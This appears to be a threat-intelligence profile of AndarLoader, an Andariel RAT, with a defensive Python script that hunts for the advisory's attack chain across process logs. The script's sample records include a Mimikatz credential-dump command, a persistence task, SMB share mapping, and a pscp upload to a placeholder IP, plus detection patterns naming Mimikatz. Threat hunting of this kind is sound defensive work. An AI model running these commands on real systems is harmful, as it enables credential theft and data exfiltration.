AndarLoader
AndarLoader is a custom malware implant/RAT associated with the DPRK Reconnaissance General Bureau (RGB) 3rd Bureau threat group Andariel, also tracked as Onyx Sleet and formerly as PLUTONIUM, DarkSeoul, Silent Chollima, and Stonefly/Clasiopa. It is listed in a July 2024 joint FBI-led Cybersecurity Advisory as one of multiple Andariel-developed RATs and implants used in the group’s cyber espionage and ransomware operations. The advisory attributes Andariel’s activity to campaigns targeting defense, aerospace, nuclear, and engineering organizations for sensitive military information and intellectual property, with additional targeting of medical and energy sectors; the group has also funded espionage through ransomware operations against U.S. healthcare entities.
Within the advisory, AndarLoader is identified as part of a broader Andariel malware ecosystem used after initial compromise. The actors commonly obtain access by exploiting public-facing web servers and known vulnerabilities, including CVE-2021-44228 (Log4Shell), then deploy web shells, establish persistence via Scheduled Tasks, steal credentials using tools such as Mimikatz, move laterally with SMB and RDP, and exfiltrate data via cloud services or tools such as PuTTY and WinSCP. The advisory states Andariel-developed implants and RATs, including AndarLoader, support capabilities such as arbitrary command execution, keylogging, screenshots, file and directory listing, browser history retrieval, process snooping, and uploading content to command-and-control infrastructure. The actors also use tunneling and proxy tools, disguise command and control within HTTP traffic, and routinely pack late-stage tooling with VMProtect and Themida for evasion.
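The post-compromise chain above (web shell, Scheduled Task persistence, credential theft, SMB/RDP lateral movement, PuTTY/WinSCP exfiltration) is something a hunter correlates across a host rather than alerts on one event at a time, since each step alone (an admin launching WinSCP, say) is common. The following Python is an added illustration, not code from the advisory, this page, or the Mallory platform: it maps constructed process-creation records onto the chain stages and reports hosts where several stages appear in sequence. The record schema (`ProcEvent`), the process-name sets, and the sample events are assumptions for illustration and carry no AndarLoader indicators; tune the sets to the web stacks and admin tooling actually present in your estate.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

# Illustrative process-name sets (assumptions, not indicators from the advisory).
WEB_SERVER_PROCS = {"w3wp.exe", "httpd.exe", "tomcat9.exe", "java.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
TRANSFER_TOOLS = {"pscp.exe", "psftp.exe", "plink.exe", "winscp.exe"}  # PuTTY suite / WinSCP
LATERAL_TOOLS = {"mstsc.exe"}  # RDP client; SMB share mapping is matched on 'net use' below


@dataclass
class ProcEvent:
    """One process-creation record. Field names are an assumed, simplified schema."""
    ts: int        # epoch seconds (constructed)
    host: str
    parent: str    # parent image file name
    image: str     # image file name
    cmdline: str


def classify(ev: ProcEvent) -> Optional[str]:
    """Map a single record to a stage of the chain, or None if it matches nothing."""
    image, parent, cmd = ev.image.lower(), ev.parent.lower(), ev.cmdline.lower()
    if parent in WEB_SERVER_PROCS and image in SHELLS:
        return "webshell_spawn"            # web server process launching a shell
    if image == "schtasks.exe" and "/create" in cmd:
        return "schtask_persistence"       # Scheduled Task persistence
    if "mimikatz" in image or "sekurlsa::" in cmd:
        return "credential_theft"          # Mimikatz binary or its module syntax
    if image in LATERAL_TOOLS or (image == "net.exe" and " use " in cmd and "\\\\" in cmd):
        return "lateral_movement"          # RDP client or SMB share mapping
    if image in TRANSFER_TOOLS:
        return "exfil_tool"                # PuTTY/WinSCP-style transfer tooling
    return None


def hunt(events: List[ProcEvent], min_stages: int = 2) -> Dict[str, List[str]]:
    """Return hosts on which at least `min_stages` distinct stages were seen,
    with the stages listed in order of first occurrence. One transfer-tool
    launch on its own never qualifies; the chain is the signal."""
    first_seen: Dict[str, Dict[str, int]] = defaultdict(dict)
    for ev in sorted(events, key=lambda e: e.ts):
        stage = classify(ev)
        if stage and stage not in first_seen[ev.host]:
            first_seen[ev.host][stage] = ev.ts
    return {
        host: sorted(stages, key=stages.get)
        for host, stages in first_seen.items()
        if len(stages) >= min_stages
    }


# Constructed sample telemetry: one compromised web host and one benign workstation.
SAMPLE_EVENTS = [
    ProcEvent(100, "web01", "w3wp.exe", "cmd.exe", 'cmd.exe /c "whoami"'),
    ProcEvent(160, "web01", "cmd.exe", "schtasks.exe",
              'schtasks.exe /create /tn "Updater" /tr C:\\ProgramData\\u.exe /sc onlogon'),
    ProcEvent(400, "web01", "cmd.exe", "m.exe",
              '"m.exe" "privilege::debug" "sekurlsa::logonpasswords"'),
    ProcEvent(900, "web01", "cmd.exe", "net.exe", r"net use \\10.0.0.5\C$ /user:corp\svc"),
    ProcEvent(2000, "web01", "cmd.exe", "pscp.exe",
              "pscp.exe -P 443 C:\\Temp\\a.zip user@203.0.113.7:/tmp"),
    ProcEvent(500, "dev07", "explorer.exe", "WinSCP.exe", "WinSCP.exe"),   # routine admin use
    ProcEvent(600, "dev07", "explorer.exe", "notepad.exe", "notepad.exe"),
]

if __name__ == "__main__":
    for host, stages in hunt(SAMPLE_EVENTS).items():
        print(host, "->", " > ".join(stages))
```

Only `web01` is reported, with the five stages in the order they occurred; `dev07` shows a single transfer-tool launch and stays below the threshold. The next step in a real environment is to join the flagged hosts against the hashes, user-agent strings, and YARA rules the advisory publishes.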
This page does not carry AndarLoader-specific indicators of compromise separate from the broader Andariel advisory. The advisory itself contains hashes, user-agent strings, and YARA rules covering the group's activity and tooling, and those are the starting point for any hunt on this family.
Vulnerabilities exploited
1 CVE correlated with this family across public research and vendor advisories. Supporting excerpt from the advisory:
"Over the last 15 years, the group has developed RATs, including the following... ▪ AndarLoader"
Groups observed using it
2 distinct threat actors attributed by public researchers.
Techniques & procedures
1 distinct technique documented for this family, organized by ATT&CK tactic.
Resource Development (1 technique): "These tools include functionality for executing arbitrary commands... and uploading content to command and control (C2) [T1587.001, T1587.004]."
Recent activity
2 sources tracked across advisories, community write-ups, and news.